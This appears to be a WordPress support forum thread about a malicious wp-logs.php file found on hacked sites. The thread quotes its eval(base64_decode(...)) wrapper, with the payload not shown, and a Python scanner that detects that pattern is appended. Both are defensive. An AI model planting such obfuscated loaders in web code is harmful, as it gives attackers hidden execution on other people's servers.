• upoopoo

    (@upoopoo)


    This is actually not related to WordPress at all, but since the file is trying to impersonate a component of WordPress I thought I would post here. Basically there is a wp-logs.php script that gets run. Code looks like this:

    <?eval(base64_decode(“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”));?>

    If you find this running on your server, get rid of it. I still haven’t found what was the original exploit that got this on the server in the first place, working on it. Please post here if you have found the source of the exploit or have any additional useful information.

Viewing 2 replies - 1 through 2 (of 2 total)
  • gregmce

    (@gregmce)

    Ah, crap, I found it on one of my sites too. Thanks for the heads up, and any more information would be greatly appreciated!

    Just was told that a logs.php file was running a script on one of my sites. I checked my previous backups and it appears that an index.html was replaced by this. My hosting company suspended my account without an explanation as to what it was.

  • The topic ‘wp-logs.php’ is closed to new replies.
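
For anyone checking their own web root for the pattern described in this thread, here is a small scanner, added as an example and not code posted by any participant. It flags PHP files containing an `eval(base64_decode("..."))` call and decodes the argument for review without executing it; the sample files other than the `wp-logs.php` name, and their payloads, are constructed for the demo.

```python
import base64
import binascii
import re
import tempfile
from pathlib import Path

PHP_SUFFIXES = {".php", ".phtml", ".inc"}
# eval(base64_decode("...")) with optional whitespace and either quote style.
PATTERN = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*([\"'])([A-Za-z0-9+/=\s]*)\1", re.I)

def scan_file(path):
    """Return one finding per eval(base64_decode(...)) call in the file."""
    data = Path(path).read_bytes()
    findings = []
    for m in PATTERN.finditer(data):
        line = data.count(b"\n", 0, m.start()) + 1
        try:
            decoded = base64.b64decode(m.group(2))  # decoded only, never run
        except (binascii.Error, ValueError):
            decoded = b""
        findings.append({"line": line,
                         "preview": decoded[:60].decode("latin-1")})
    return findings

def scan_tree(root):
    """Walk root and map relative file path -> findings for flagged files."""
    root = Path(root)
    results = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in PHP_SUFFIXES:
            hits = scan_file(p)
            if hits:
                results[str(p.relative_to(root))] = hits
    return results

def demo():
    """Build a constructed web root in a temp dir and scan it."""
    payload = base64.b64encode(b'echo "constructed sample";').decode()
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "wp-logs.php").write_text(
            '<?eval(base64_decode("%s"));?>' % payload)
        (root / "cache.inc").write_text(
            "<?php\n\n@eval ( base64_decode ( '%s' ) );\n" % payload)
        (root / "index.php").write_text("<?php echo 'hello'; ?>")
        return scan_tree(root)

if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, hits)
```

Run `scan_tree()` against the document root and compare flagged files with a known-good backup before deleting anything, since the replaced file may need to be restored.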